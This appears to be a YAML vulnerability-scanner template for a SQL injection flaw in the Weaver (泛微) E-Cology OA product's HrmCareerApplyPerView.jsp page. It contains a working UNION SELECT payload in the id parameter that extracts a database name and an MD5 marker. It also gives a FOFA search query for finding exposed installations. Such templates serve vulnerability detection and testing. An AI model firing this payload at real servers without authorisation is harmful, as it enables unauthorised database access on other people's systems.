id: ecology-HrmCareerApplyPerView-sqli

info:
  name: 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库敏感文件
    FOFA: app="泛微-协同办公OA"

rules:
  r0:
    request:
      method: GET
      path: /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 union select 1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7
    expression: response.status == 200 && response.body.bcontains(b'成员') && response.body.bcontains(b'职务')
expression: r0()